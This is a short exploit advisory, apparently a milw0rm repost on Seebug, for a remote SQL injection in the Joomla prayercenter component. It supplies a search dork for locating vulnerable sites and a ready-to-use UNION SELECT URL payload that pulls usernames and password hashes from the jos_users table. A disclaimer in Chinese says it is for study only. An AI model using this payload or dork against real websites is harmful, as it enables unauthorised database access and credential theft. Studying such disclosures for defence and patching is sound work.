/---------------------------------------------------------------\ \ / / Joomla Component prayercenter Remote SQL injection \ \ / \---------------------------------------------------------------/ [*] Author : His0k4 [ALGERIAN HaCkEr] [*] Dork : inurl:"com_prayercenter" [*] POC : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL} [*] Example : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users-- [*] Note : Sometimes you need to register for doing this exploit ---------------------------------------------------------------------------- [*] Greetings : Str0ke, all friends & muslims HaCkeRs... [*] Greetings2 : http://www.palcastle.org/cc # milw0rm.com [2008-05-31]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论